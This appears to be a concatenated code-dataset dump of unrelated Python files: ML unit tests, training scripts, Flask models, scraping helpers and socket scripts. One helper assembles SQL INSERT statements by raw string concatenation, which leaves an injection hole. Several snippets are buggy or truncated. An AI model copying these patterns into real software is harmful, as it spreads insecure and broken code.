# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unittests for elementwise fusion out-of-order cases.
"""
import unittest
import torch
from aitemplate.compiler import compile_model, ops
from aitemplate.compiler.ops.common.epilogue import FuncEnum
from aitemplate.frontend import Tensor
from aitemplate.testing import detect_target
from aitemplate.testing.test_utils import (
filter_test_cases_by_params,
get_random_torch_tensor,
get_torch_empty_tensor,
TestEnv,
)
from parameterized import parameterized
from torch import nn
class FusedElementwiseOutOfOrderTestCase(unittest.TestCase):
@parameterized.expand(
**filter_test_cases_by_params(
{
TestEnv.CUDA_LESS_THAN_SM80: [("float16")],
TestEnv.CUDA_SM80: [("float")],
}
)
)
def test_fused_elementwise_out_of_order(self, dtype):
r"""
X0 X1
\ /
Add_1 Gemm_2(X2, X4)
| \ /
Gemm_1(X3) Sub_1
| |
| Gemm_3(X4)
\ /
Sub_2
Add_1 and Sub_1 will be fused together.
However tensor order needs to be re-adjusted.
Original order:
[X0, X1, R0, X3, R1, X2, X4, R2, R3, R4, R5]
New order:
[X2, X4, R2, X0, X1, R0, X3, R1, R3, R4, R5]
"""
target = detect_target()
if dtype == "float" and (int(target._arch) < 80 or target.name == "rocm"):
self.skipTest("gemm with float tensors requires CUDA sm >= 80")
M = 10
K = 4
N = 4
X0 = Tensor(
shape=[M, K],
dtype=dtype,
name="X0",
is_input=True,
)
X1 = Tensor(
shape=[],
dtype=dtype,
name="X1",
value=3.0,
)
X2 = Tensor(
shape=[M, K],
dtype=dtype,
name="X2",
is_input=True,
)
X3 = Tensor(
shape=[K, N],
dtype=dtype,
name="X3",
is_input=True,
)
X4 = Tensor(
shape=[K, N],
dtype=dtype,
name="X4",
is_input=True,
)
R0 = ops.elementwise(FuncEnum.ADD)(X0, X1)
R1 = ops.gemm_rcr()(R0, X3)
R2 = ops.gemm_rcr()(X2, X4)
R3 = ops.elementwise(FuncEnum.SUB)(R0, R2)
R4 = ops.gemm_rcr()(R3, X4)
R5 = ops.elementwise(FuncEnum.SUB)(R1, R4)
R5._attrs["name"] = "R5"
R5._attrs["is_output"] = True
module = compile_model(
R5,
target,
"./tmp",
f"fused_elementwise_out_of_order_{dtype}",
)
x0_pt = get_random_torch_tensor([M, K], dtype)
x2_pt = get_random_torch_tensor([M, K], dtype)
x3_pt = get_random_torch_tensor([K, N], dtype)
x4_pt = get_random_torch_tensor([K, N], dtype)
r0_pt = x0_pt + 3
r1_pt = nn.functional.linear(r0_pt, x3_pt)
r2_pt = nn.functional.linear(x2_pt, x4_pt)
r3_pt = r0_pt - r2_pt
r4_pt = nn.functional.linear(r3_pt, x4_pt)
r5_pt = r1_pt - r4_pt
r5 = get_torch_empty_tensor([M, N], dtype)
input_name_to_idx_mapping = module.get_input_name_to_index_map()
inputs = [None] * len(input_name_to_idx_mapping)
input_name_to_pt_mapping = {
"X0": x0_pt,
"X2": x2_pt,
"X3": x3_pt,
"X4": x4_pt,
}
for input_name, pt in input_name_to_pt_mapping.items():
inputs[input_name_to_idx_mapping[input_name]] = pt
module.run_with_tensors(inputs, [r5])
self.assertTrue(torch.allclose(r5, r5_pt, atol=1e-2, rtol=1e-2))
def test_fused_elementwise_out_of_order_with_size(self):
pass
if __name__ == "__main__":
unittest.main()
|
20,718 | 17cd28cc8b4479a398c9eb5484f9f20ffb527a5c | #encoding:utf-8
__authors__ = ['"Liu Fei" <fei.liu@cs2c.com.cn>']
__version__ = "V0.1"
'''
# ChangeLog:
#---------------------------------------------------------------------------------
# Version Date Desc Author
#---------------------------------------------------------------------------------
# V0.1 2014/10/17 初始版本 Liu Fei
#---------------------------------------------------------------------------------
'''
'''-----------------------------------------------------------------------------------------
@note: Pre-TestData
-----------------------------------------------------------------------------------------'''
from Configs import GlobalConfig
host = GlobalConfig.Hosts['node1']
'''-----------------------------------------------------------------------------------------
@note: Test-Data
-----------------------------------------------------------------------------------------'''
# 主机名称:(1)包含特殊字符;(2)超过255个字符.
password = 'abcdefghijklmn'
xml_host_info = '''
<host>
<name>node-ITC03010306</name>
<address>%s</address>
<root_password>%s</root_password>
</host>
''' % (host['ip'], password)
'''-----------------------------------------------------------------------------------------
@note: Post-TestData
-----------------------------------------------------------------------------------------'''
'''-----------------------------------------------------------------------------------------
@note: ExpectedResult
-----------------------------------------------------------------------------------------'''
expected_status_code = 409
expected_info ='''
<fault>
<reason>Operation Failed</reason>
<detail>[Cannot add Host. SSH authentication failed, verify authentication parameters are correct (Username/Password, public-key etc.) You may refer to the engine.log file for further details.]</detail>
</fault>
''' |
20,719 | 924d9a668cc1653dec9038da04bdbcec7dfc4a2c | m=input().split()
n=(int,input().split())
print(min(m))
|
20,720 | 5326b8a28175c88ebb6053db40838446d2085560 | import MyMNIST as mnist
import torch
from torch import nn
import numpy as np
from torch.utils.data.sampler import SubsetRandomSampler
from torch.utils.data import DataLoader
from torch import optim
import matplotlib.pyplot as plt
import pickle
import NeuralNetwork as mynn
import MyMNIST as mnist
class NeuralNetwork (nn.Module):
def __init__(self, input,hidden,output):
super().__init__()
self.hiddenLayer = nn.Linear(input,hidden)
self.outputLayer = nn.Linear(hidden,output)
def forward(self, x):
x = self.hiddenLayer(x)
x = torch.sigmoid(x)
x = self.outputLayer(x)
return x
if __name__ == '__main__':
#1 Model and Dataset
print("loading data ...")
mnistTrain = mnist.MyMNIST(train=True)
layers = [28*28,150,10]
activationArr = ['sigmoid','tanh','relu']
#2 Sampler and Data loader
split = int(0.8 * len(mnistTrain))
idxArr = np.arange(len(mnistTrain))
trainIdx, valIdx = idxArr[:split], idxArr[split:]
trainSampler = SubsetRandomSampler(trainIdx)
valSampler = SubsetRandomSampler(valIdx)
trainLoader = DataLoader(mnistTrain,batch_size=256,sampler=trainSampler)
validLoader = DataLoader(mnistTrain, batch_size=256, sampler=valSampler)
#3 Optimizer
lossFunction = nn.CrossEntropyLoss()
trainLogger = mnist.TrainLogger("MNIST classifiers")
for idx, actFunct in enumerate(activationArr):
model = mynn.NeuralNetwork(layers, actFunct)
optimizer = optim.SGD(params=model.parameters(), lr=0.1, weight_decay=1e-6, momentum=0.9, nesterov=True)
modelName = actFunct+'_nn'
trainLogger.addModelInfo(modelName)
valAccuracyHistory =[]
trLossHistory = []
print("training {} model ...".format(modelName))
#4 Train
for epoch in range(50):
for x,y in trainLoader:
optimizer.zero_grad()
yHat = model(x)
loss = lossFunction(yHat,y)
loss.backward()
optimizer.step()
trLossHistory.append(loss.item())
correct = 0
total = 0
for x,y in validLoader:
z = model(x)
yHat = z.argmax(1)
correct += (yHat==y).sum().item()
total += y.shape[0]
accuracy = correct / total
valAccuracyHistory.append(accuracy)
print("Accuracy in validation in epoch {:d} set: {:.6f}".format(epoch,accuracy))
print("Accuracy in validation in epoch {:d} set: {:.6f}".format(epoch, accuracy))
torch.save(model.state_dict(), './_DiffActivationComp/'+modelName+'.pt')
#Add Train information to data logger
trainLogger.dict[modelName]['layers'] = layers
trainLogger.dict[modelName]['activation'] = actFunct
trainLogger.dict[modelName]['trainLoss'] = trLossHistory
trainLogger.dict[modelName]['validationAccuracy'] = valAccuracyHistory
with open('./_DiffActivationComp/'+'trainLogger'+'_log.pt','wb') as outFile:
pickle.dump(trainLogger.dict, outFile)
fig, axes = plt.subplots(2, 1)
for modelName in trainLogger.dict.keys():
trLossHistory = trainLogger.dict[modelName]['trainLoss']
valAccuracyHistory = trainLogger.dict[modelName]['validationAccuracy']
axes[0].plot(trLossHistory,label = modelName)
axes[1].plot(valAccuracyHistory,label = modelName)
axes[0].legend()
axes[1].legend()
plt.show()
print("Finish")
|
20,721 | 882a17a76c79508c75e618b3b86cb5f191830cdb | from transaction import Transaction
class RoomManagement:
def set_room_not_available(self, transaction: Transaction, params):
transaction.start_action(
transaction.update,
{
'entity_name': 'rooms',
'set_values': {
'id': params['roomNumber'],
'userId': params['userId'],
'status': 'not_available',
},
'conditions': {
'id': params['roomNumber'],
'userId': None,
'status': 'available',
}
}
)
def get_rooms(self, transaction: Transaction):
return transaction.select('rooms', {})
def get_available_rooms(self, transaction: Transaction):
return transaction.select(
'rooms',
{
'status': 'available',
}
)
|
20,722 | 62c1d3b6aab1910b06861036065199a95759856d | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
Follow up: Can you solve it in O(n) time and O(1) space?
"""
import sys
import pytest
class Solution:
def backspaceCompare(self, s: str, t: str) -> bool:
"""From the back"""
i = len(s)-1
j = len(t)-1
di = dj = 0
while i>=0 or j>=0:
if i>=0 and s[i] == '#':
di += 1
i -= 1
elif di > 0:
di -= 1
i -= 1
elif j>=0 and t[j] == '#':
dj += 1
j -= 1
elif dj > 0:
dj -= 1
j -= 1
elif i>=0 and j>=0 and s[i] == t[j]:
i -= 1
j -= 1
else:
return False
return True
@pytest.mark.parametrize('s, t, expected', [
("ab#c", "ad#c", True),
("ab##", "c#d#", True),
("a#c", "b", False),
])
def test(s, t, expected):
assert expected == Solution().backspaceCompare(s, t)
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
20,723 | 076e61ed2fb170c66bf410739f9eaae6e5157041 | from enum import Enum
import time
import math
rus_letters = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя"
lat_letters = "abcdefghijklmnopqrstuvwxyz"
digits = "1234567890"
puncts = ".,-:;?!()[]{}"
class html_level:
level_type = "" #class, tag...
level_name = ""
level_id = "" #number in contents list
class html_data:
element = None
text = ""
parent = None
tag_name = ""
class_name = ""
def __init__(self, _element, _text, _parent):
self.element = _element
if isinstance(_text, list):
_text = ' '.join(_text)
self.text = _text
self.parent = _parent
def clone(self):
my_clone = html_data(self.element, self.text, self.parent)
return my_clone
def is_digit(val):
if type(val) == str:
val = val.replace(',', '.')
try:
return not math.isnan(float(val))
except:
return False
def get_closest_attribute(el, attr_name):
if attr_name == "class":
attr_name = "attrs"
cur_parent = el.element
while 1:
if hasattr(cur_parent, attr_name):
if cur_parent.__getattribute__(attr_name):
if len(cur_parent.__getattribute__(attr_name)) > 0:
if attr_name == "attrs":
if cur_parent.attrs.get('class'):
return cur_parent.attrs.get('class')[0]
else:
flg_get_next_parent = True
else:
return cur_parent.__getattribute__(attr_name)
else:
flg_get_next_parent = True
else:
flg_get_next_parent = True
else:
flg_get_next_parent = True
if flg_get_next_parent:
cur_parent = cur_parent.parent
def fit_to_list_v2(el, brothers, regime):
# returns 1 if el fits to brothers list (by tag name or class name)
# regime is brother_regime
cr_tag_name = ""
cr_class_name = ""
if (regime.name == 'ALL' or regime.name == 'TAG_NAME') and hasattr(el, "name"):
cr_tag_name = el.name
if (regime.name == 'ALL' or regime.name == 'CLASS_NAME') and hasattr(el, "attrs"):
cr_class_name = el.attrs.get("class")
if cr_tag_name or cr_class_name:
brother = brothers[0]
if hasattr(brother, "attrs") and cr_class_name != "":
if brother.attrs.get("class") == cr_class_name:
return True
else:
if hasattr(brother, "name") and cr_tag_name != "":
if brother.name == cr_tag_name:
return True
def fit_to_list(el, brothers):
# returns 1 if el fits to brothers list (by tag name or class name)
cr_tag_name = ""
cr_class_name = ""
if hasattr(el, "name"):
cr_tag_name = el.name
if hasattr(el, "attrs"):
cr_class_name = el.attrs.get("class")
if cr_tag_name or cr_class_name:
brother = brothers[0]
if hasattr(brother, "attrs") and cr_class_name != "":
if brother.attrs.get("class") == cr_class_name:
return True
else:
if hasattr(brother, "name") and cr_tag_name != "":
if brother.name == cr_tag_name:
return True
def is_element_ok(el):
if hasattr(el, 'text'):
if el.text != None:
if len(el.text) > 0:
return True
def get_html_brothers_v2(el, regime):
# goes through the contents and get all relatives on the same level with the same class names or tag names
cr_brothers = []
total_brothers = []
elements_to_check = []
elements_to_check.append(el)
while len(elements_to_check) > 0:
new_el = elements_to_check.pop(0)
if is_element_ok(new_el):
if hasattr(new_el, "contents"):
for cont in new_el.contents:
if is_element_ok(cont):
elements_to_check.append(cont)
flg_found = False
for brothers in cr_brothers:
if fit_to_list_v2(cont, brothers, regime):
brothers.append(cont)
flg_found = True
if not flg_found:
new_list = []
new_list.append(cont)
cr_brothers.append(new_list[0:])
for brothers in cr_brothers:
if len(brothers) > 1:
total_brothers.append(brothers)
cr_brothers = []
return total_brothers
def get_html_brothers(el):
# goes through the contents and get all relatives on the same level with the same class names or tag names
cr_brothers = []
total_brothers = []
elements_to_check = []
elements_to_check.append(el)
while len(elements_to_check) > 0:
new_el = elements_to_check.pop(0)
if hasattr(new_el,"contents"):
for cont in new_el.contents:
elements_to_check.append(cont)
flg_found = False
for brothers in cr_brothers:
if fit_to_list(cont, brothers):
brothers.append(cont)
flg_found = True
if not flg_found:
new_list = []
new_list.append(cont)
cr_brothers.append(new_list[0:])
for brothers in cr_brothers:
if len(brothers) > 1:
total_brothers.append(brothers)
cr_brothers = []
return total_brothers
def get_contents_tree(el):
texts = [] #of html_data
elements_to_check = []
el_obj = html_data(el, "", el.parent)
elements_to_check.append(el_obj)
while 1:
for new_el in elements_to_check:
element_to_remove = new_el
if hasattr(new_el.element, "contents"):
if len(new_el.element.contents) > 0:
for cont in new_el.element.contents:
elements_to_check.append(html_data(cont, "", new_el.element))
if hasattr(new_el.element, "attrs"):
if new_el.element.attrs.get("href"):
new_text = html_data(new_el.element, new_el.element.attrs["href"], new_el.parent)
if len(clear_string(new_text.text, rus_letters + lat_letters + digits)) > 0:
if new_el.element.name and new_el.element.name != "script":
new_text.class_name = get_closest_attribute(new_text, "class")
new_text.tag_name = get_closest_attribute(new_text, "name")
texts.append(new_text)
elif hasattr(new_el.element, "attrs"): # get old price from kupivip
for attr in new_el.element.attrs:
if new_el.element.name and new_el.element.name != "script":
new_text = html_data(new_el.element, new_el.element.attrs[attr], new_el.parent)
new_text.class_name = get_closest_attribute(new_text, "class")
new_text.tag_name = get_closest_attribute(new_text, "name")
texts.append(new_text)
elif "String" in str(type(new_el.element)):
new_el_str = str(new_el.element)
new_el_str = new_el_str.replace("\n","")
new_el_str = new_el_str.strip()
if len(new_el_str) > 0:
if len(clear_string(new_el_str, rus_letters + lat_letters + digits)) > 0:
if new_el.element.name and new_el.element.name != "script":
new_text = html_data(new_el.element, new_el_str, new_el.parent)
new_text.class_name = get_closest_attribute(new_text, "class")
new_text.tag_name = get_closest_attribute(new_text, "name")
texts.append(new_text)
elements_to_check.remove(element_to_remove)
if len(elements_to_check) == 0:
break
return texts
def find_html_element(html_el, field_name, field_val):
#returns element if its field_name = field_val
all_elements = []
for el in html_el.contents:
if hasattr(el, "contents"):
all_elements.append(el)
elements_to_remove = []
while(1):
for el in all_elements:
for cont in el.contents:
if hasattr(cont, "attrs"):
for key in cont.attrs:
if key == field_name:
if cont.attrs[field_name][0] == field_val:
return cont
elif hasattr(cont, "contents"):
all_elements.append(cont)
elements_to_remove.append(el)
for el in elements_to_remove:
all_elements.remove(el)
elements_to_remove.clear()
if not all_elements:
break
def clear_string(str_to_clear, legitimate_symbols):
i = 0
new_str = ""
while i <= len(str_to_clear)-1:
cr_symb = str(str_to_clear[i].lower())
if legitimate_symbols.find(cr_symb) != -1:
#if puncts.find(cr_symb) == -1 or i < len(str_to_clear)-1:
new_str += str_to_clear[i]
i += 1
return new_str.strip()
def clear_link(link_to_clear, prefix):
# cuts the start of the link_to_clear until meets 'h' or 'w'
h_start = link_to_clear.find("h")
w_start = link_to_clear.find("w")
if h_start == -1:
if w_start == -1:
return ""
else:
start = w_start
else:
if w_start == -1:
start = h_start
else:
start = min(h_start,w_start)
res = link_to_clear[start:]
# add http(s) to the beginning
http_prefix = prefix.split(":")[0]
if http_prefix[0] == 'h':
if res.find("http") != 0:
res = http_prefix + "://" + res
return res
def execute_query(conn, query, time_limit=0):
c = conn.cursor()
cr_time = time.clock()
while 1:
try:
c.execute(query)
conn.commit()
return c.lastrowid
except:
if (time_limit > 0 and time.clock() - cr_time > time_limit) or time_limit == 0:
print("unable to execute: " + query)
return -1
def build_insert_expression(data_dict, table_to_insert):
"""
creates INSERT INTO command
:param data_dict: {fieldName: [fieldValue, flgStringType]}
:param table_to_insert:
:return: command str
"""
command_str_left = "INSERT INTO " + table_to_insert + " ("
command_str_right = " VALUES ("
for field_name in data_dict:
field_value = data_dict[field_name][0]
flg_string_type = data_dict[field_name][1]
if command_str_left[-1] != "(":
command_str_left += ","
command_str_right += ","
if flg_string_type: command_str_right += "'"
command_str_left += field_name
command_str_right += str(field_value)
if flg_string_type: command_str_right += "'"
command_str = command_str_left + ")" + command_str_right + ")"
return command_str |
20,724 | 483bcd0e10f7211eb0582d5673e2c5b3f2f2ae0d | '''
Speed Validator
This application is used to validate the crew's speed during their RSP validations. To use the application, the validation runs must be in their own folder.
Created on Oct 9, 2013
@author: Elliott Locke
'''
from Tkinter import Tk
from tkFileDialog import askdirectory
import xml.etree.ElementTree as ET
import tkMessageBox
import os, sys, glob
import numpy
import matplotlib.pyplot as plt
from matplotlib.pyplot import legend
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import SimpleDocTemplate, Paragraph
# These imports below needed to be added in order to get a usable py app.
from reportlab.pdfbase import _fontdata_enc_winansi
from reportlab.pdfbase import _fontdata_enc_macroman
from reportlab.pdfbase import _fontdata_enc_standard
from reportlab.pdfbase import _fontdata_enc_symbol
from reportlab.pdfbase import _fontdata_enc_zapfdingbats
from reportlab.pdfbase import _fontdata_enc_pdfdoc
from reportlab.pdfbase import _fontdata_enc_macexpert
from reportlab.pdfbase import _fontdata_widths_courier
from reportlab.pdfbase import _fontdata_widths_courierbold
from reportlab.pdfbase import _fontdata_widths_courieroblique
from reportlab.pdfbase import _fontdata_widths_courierboldoblique
from reportlab.pdfbase import _fontdata_widths_helvetica
from reportlab.pdfbase import _fontdata_widths_helveticabold
from reportlab.pdfbase import _fontdata_widths_helveticaoblique
from reportlab.pdfbase import _fontdata_widths_helveticaboldoblique
from reportlab.pdfbase import _fontdata_widths_timesroman
from reportlab.pdfbase import _fontdata_widths_timesbold
from reportlab.pdfbase import _fontdata_widths_timesitalic
from reportlab.pdfbase import _fontdata_widths_timesbolditalic
from reportlab.pdfbase import _fontdata_widths_symbol
from reportlab.pdfbase import _fontdata_widths_zapfdingbats
def ruttingValidation():
#Get the folder to the route paths
Tk().withdraw() #Not a full GUI
options={"title": "Choose the folder which contains the validation runs.", "message": "This script will create a speed validation report based from the RSP files in your folder."}
fileDir = askdirectory(**options) #show an open dialog box - This is for the folder containing multiple routes.
RouteDirs = get_immediate_subdirectories(fileDir)
for dirs in RouteDirs:
xmlPath = fileDir + '/' + dirs + "/LCMSDistress/"
if os.path.exists(xmlPath) == True:
fulldir = xmlPath
else:
fulldir = 0
if fulldir > 0:
xmlfilepaths = []
os.chdir(fulldir)
for files in glob.glob("*.xml"):
xmlfilepaths.append(fulldir + files)
def parseXMLRut(filePath):
tree = ET.parse(filePath)
root = tree.getroot()
def get_immediate_subdirectories(dirs):
return [name for name in os.listdir(dirs) if os.path.isdir(os.path.join(dirs, name))]
if __name__ == '__main__':
ruttingValidation()
|
20,725 | ba83f7a044797e3749758aadad1f50610a027ed3 | '''rectangle.py for CS108, Homework 8.
Author: Keith VanderLinden and Victor Norman
Date: 7 April 2017
Modified by: Ivanna Rodriguez @imr6
'''
import turtle
import sys
class Rectangle:
def __init__(self, x=0, y=0, width=50, height=50, color='black'):
self._color = color
self._x = x
self._y = y
if width > 0 and height > 0:
self._width = width
self._height = height
else:
raise ValueError('Width and height must be positive.')#raise exception if rectangle values are not positive
def __str__(self):
return '(' + str(self._x) + ',' + str(self._y) + '), ' + str(self._width) + \
', ' + str(self._height) + ', ' + str(self._color)
def get_x(self):
return self._x
def get_y(self):
return self._y
def get_color(self):
return self._color
def get_width(self):
return self._width
def get_height(self):
return self._height
def get_area(self):
return self._width * self._height
def get_perimeter(self):
return 2 * (self._width + self._height)
def modify_width(self, delta=0.0):
'''Modify the height of the rectangle by the given delta.
Ensure that the width is still a positive number.'''
new_width = self._width + delta
if new_width > 0:
self._width = new_width
else:
print('invalid width...')
sys.exit(-1)
def modify_height(self, delta=0.0):
'''Modify the height of the rectangle by the given delta.
Ensure that the height is still a positive number.'''
new_height = self._height + delta
if new_height > 0:
self._height = new_height
else:
print('invalid height...')
sys.exit(-1)
def overlaps(self, rectangle2):
'''
Return True if this rectangle overlaps with the given rectangle2;
False otherwise.
'''
r1_left_of_r2 = self._x + self._width < rectangle2.get_x()
r2_left_of_r1 = rectangle2.get_x() + rectangle2.get_width() < self._x
r1_above_r2 = self._y - self._height > rectangle2.get_y()
r2_above_r1 = rectangle2.get_y() - rectangle2.get_height() > self._y
return not (r1_left_of_r2 or r2_left_of_r1 or r1_above_r2 or r2_above_r1)
def render(self, turtle):
'''Draw the rectangle using the given turtle.'''
turtle.penup()
turtle.seth(0)
turtle.color(self._color)
turtle.goto(self._x, self._y)
turtle.pendown()
turtle.forward(self._width)
turtle.right(90)
turtle.forward(self._height)
turtle.right(90)
turtle.forward(self._width)
turtle.right(90)
turtle.forward(self._height)
#Testing
if __name__ == '__main__':
window = turtle.Screen()
pen = turtle.Turtle()
#draw two rectangles and determine if they overlap
r1 = Rectangle()#default rectangle
r1.render(pen)
print(r1)
r2 = Rectangle(10, 10, 50, 50, 'red')
r2.render(pen)
print(r1.overlaps(r2))
#try valid rectangle and print its properties
try:
r6=Rectangle(100,100,500,400, 'violet')
print(r6)
except ValueError as ve:
print(ve)
#try invalid rectangles to raise exceptions
try:
r3= Rectangle(0,0,-100,-250, 'blue')
print(r3)
except ValueError as ve:
print(ve)
try:
r4= Rectangle(0,0,-100,300, 'blue')
print(r4)
except ValueError as ve:
print(ve)
try:
r5= Rectangle(0,0,300,-250, 'blue')
print(r5)
except ValueError as ve:
print(ve)
pen.hideturtle()
window.exitonclick()
|
20,726 | 4e1d66768096ef9b1d0dcbb890667de4249dc0af | # -*- coding: utf-8 -*-
#models.py
#models mapping to database
from flask_sqlalchemy import SQLAlchemy
from passlib.apps import custom_app_context as password_context #for password hashing
import re #for regular expression
db=SQLAlchemy()
def many_returns(query): #쿼리 응답이 여러개의 튜플을 리턴할 때 serialization
tuple_list=[]
for tuple in query:
tuple_list.append(tuple.as_dict())
return tuple_list
class AddUpdateDelete():
def add(self,resource):
db.session.add(resource)
return db.session.commit()
def update(self):
return db.session.commit()
def delete(self,resource):
db.session.delete(resource)
return db.session.commit()
def as_dict(self): #쿼리결과를 dictionary로 변환
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
#class이름과 db table이름을 일치시킨다. 일치하지 않을땐 __tablename__="테이블명"으로 매칭
class member(db.Model, AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
id=db.Column(db.String(16), unique=True, nullable=False)
pw=db.Column(db.String(255), nullable=False) #hashed password
name=db.Column(db.String(20), nullable=False)
college=db.Column(db.String(20), nullable=False)
major=db.Column(db.String(20), nullable=False)
undergrad_number=db.Column(db.Integer, nullable=False)
email=db.Column(db.String(30), nullable=False)
nickname=db.Column(db.String(20))
regdate=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
level=db.Column(db.Integer, default=1)
def verify_password(self, password):
return password_context.verify(password, self.pw)
#패스워드의 유효성을 검사하고 모두 만족시 해시 암호화 한다(64bit-SHA512,32bit-SHA256)
#처리에 시간이 오래걸릴 경우 필요 라운드 수를 줄여야 함
def check_password_strength_and_hash_if_ok(self, password):
if len(password)<8:
return 'The password is too short.', False
if len(password)>16:
return 'The password is too long.', False
if re.search(r'[a-zA-Z]', password) is None:
return 'The password must include at least one alphabet', False
if re.search(r'\d', password) is None:
return 'The password must include at least one number', False
if re.search(r"[!@#$%&'()*+,-./[\\\]^_`{|}~"+r'"]', password) is None:
return 'The password must include at least one symbol', False
self.pw=password_context.encrypt(password)
return '', True
def __init__(self,id,name,college,major,undergrad_number,email,nickname):
self.id=id
self.name=name
self.college=college
self.major=major
self.undergrad_number=undergrad_number
self.email=email
if nickname:
self.nickname=nickname
else: #닉네임이 None이면 이름을 닉네임으로 설정.
self.nickname=name
class board(db.Model,AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
category=db.Column(db.Integer, db.ForeignKey('category.idx'), nullable=False)
writer=db.Column(db.Integer, db.ForeignKey('member.idx'), nullable=False)
parent=db.Column(db.Integer)
od=db.Column(db.Integer)
depth=db.Column(db.Integer)
subject=db.Column(db.String(255), nullable=False)
content=db.Column(db.TEXT)
reg_date=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
hit=db.Column(db.Integer, default=0)
goods=db.Column(db.Integer, default=0)
def __init__(self,category,writer,parent,od,depth,subject,content):
self.category=category
self.writer=writer
self.parent=parent
self.od=od
self.depth=depth
self.subject=subject
self.content=content
class category(db.Model,AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
name=db.Column(db.String(20),nullable=False)
skin=db.Column(db.String(50))
def __init__(self,name,skin):
self.name=name
self.skin=skin
class comment(db.Model,AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
bidx=db.Column(db.Integer, db.ForeignKey('board.idx',ondelete='CASCADE'), nullable=False)
writer=db.Column(db.Integer, db.ForeignKey('member.idx'), nullable=False)
od=db.Column(db.Integer)
depth=db.Column(db.Integer)
content=db.Column(db.TEXT)
date=db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)
def __init__(self,bidx,writer,od,depth,content):
self.bidx=bidx
self.writer=writer
self.od=od
self.depth=depth
self.content=content
class cms(db.Model,AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
content=db.Column(db.VARCHAR(255))
deposit=db.Column(db.Integer)
withdraw=db.Column(db.Integer)
date=db.Column(db.DATE)
def __init__(self,content,deposit,withdraw,date):
self.content=content
self.deposit=deposit
self.withdraw=withdraw
self.date=date
class meta_data(db.Model, AddUpdateDelete):
key=db.Column(db.String(20), primary_key=True)
value=db.Column(db.TEXT)
def __init__(self, key, value):
self.key=key
self.value=value
class files(db.Model, AddUpdateDelete):
idx=db.Column(db.Integer, primary_key=True)
table=db.Column(db.String(20))
id=db.Column(db.Integer)
origin_name=db.Column(db.VARCHAR(255))
file_name=db.Column(db.String(50))
reg_date=db.Column(db.TIMESTAMP)
def __init__(self,table,id,origin_name,file_name,reg_date):
self.table=table
self.id=id
self.origin_name=origin_name
self.file_name=file_name
self.reg_date=reg_date
|
20,727 | 3e40b7588fcb739c02cf8742b44c83889dc7517a | from rest_framework import authentication
from storeapp.models import Product, Products
from .serializers import ProductSerializer, ProductsSerializer
from rest_framework import viewsets
class ProductsViewSet(viewsets.ModelViewSet):
serializer_class = ProductsSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Products.objects.all()
class ProductViewSet(viewsets.ModelViewSet):
serializer_class = ProductSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Product.objects.all()
|
20,728 | 0d7413e19db0d9390df0da032c01a5b9439321a3 | import socket
def main():
#创建一个udp套接字
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# 绑定本地信息
udp_socket.bind(("", 7890))
while True:
# 从键盘获取数据
send_data = input("请输入要发送的数据:")
a = "\n"
# 可以使用套接字收发数据
# udp_socket.sendto("hahaha hello", 对方的ip以及port)
# udp_socket.sendto(b"hello udp JunJie %d \n" % i, ("192.168.0.108", 8080))
udp_socket.sendto(send_data.encode("utf-8"), ("192.168.0.105", 8080))
udp_socket.sendto(a.encode("utf-8"), ("192.168.0.105", 8080))
if send_data == "exit":
break
# 5.关闭套接字
udp_socket.close()
if __name__ == '__main__':
main()
|
20,729 | bc94cf0ce652f322bed90b45f9a065860426dbc0 | # coding:utf-8
from websocket_server import WebsocketServer
from websocket import create_connection
import ModulePack as MP
import threading
import time
import hashlib
"""
Called when core node contact
"""
def new_client(client, server):
print (client["address"][0] + " contacted")
"""
Define websocket server
"""
def wsserver(address):
server = WebsocketServer(9998, host=address)
server.set_fn_new_client(new_client)
server.set_fn_message_received(msg_reaction)
server.run_forever()
"""
Called when server receive message
"""
def msg_reaction(client, server, rec_msg):
rec_json = MP.str_to_dic(rec_msg)
react_func(rec_json)
"""
Define reaction to message
"""
def react_func(json_file):
print(json_file["result"])
"""
Send json file to opponent
"""
def ws_transmission(ws, json_file):
sendmsg = MP.dic_to_str(json_file)
ws.send(sendmsg)
"""
Run server on sub thread
"""
class PBFTServer(threading.Thread):
def __init__(self, address):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
self.setDaemon(True)
self.address = address
def stop(self):
self.stop_event.set()
def run(self):
wsserver(self.address)
if __name__ == "__main__":
address = MP.get_address("leaf_address.txt")
serverthread = PBFTServer(address[0])
serverthread.start()
time.sleep(0.1)
print ("If you are ready, input \"ok\"")
while True:
ready = input()
if ready == "ok":
break
request_num = 0
ws_core = create_connection("ws://" + address[1] + ":9999/")
while True:
print ("input transaction data.")
